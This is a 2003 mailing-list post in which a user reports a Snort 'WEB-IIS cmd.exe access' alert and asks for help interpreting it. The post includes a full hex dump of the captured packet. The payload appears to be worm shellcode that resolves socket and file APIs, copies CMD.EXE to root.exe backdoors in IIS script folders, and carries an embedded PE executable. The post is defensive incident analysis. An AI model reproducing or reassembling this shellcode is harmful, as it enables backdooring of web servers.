Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

strange cmd.exe access

From: Q <quentyn () the-q co uk>
Date: Thu, 29 May 2003 20:10:25 +0100 (BST)
Hi I saw this packet 

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002]  WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP:  port=27761 -> dport: 80  flags=***A**** seq=915915841
      ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65   .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0   Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC   ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69   .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00   te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89   ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D   E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B   Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55   ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63   .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00   ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8   ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF   .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E   u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00   d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C   recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF   ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74   u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55   hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C   ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89   astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89   ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8   E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF   ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC   ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF   ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF   ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF   ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7   .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB   .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00   .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE   ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00   .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D   d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44   on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19   C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC   ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC   ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B   *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00   ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00   ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03   ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00   ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00   ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00   ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC   ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10   ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00   ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00   ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C   ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00   ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30   ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00   ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC   ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00   ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00   ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00   .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00   ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB   .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20   .h.$@.h?...j.h. 
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26   @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00   j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40   .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00   ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00   j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD   ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00   . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8   j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68   ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF   . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40   5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68   .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF                           .$@.j.U.

what is strange is that the cmd.exe / root.exe stuff is half way through
with some other code before it 

the ip it hit was not mapped to anything ( I believe it is unused) so this
can not have been part of another tcp converstion


any ideas ?


--
The should be a sig here, but it got bored and wandered off 


----------------------------------------------------------------------------
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: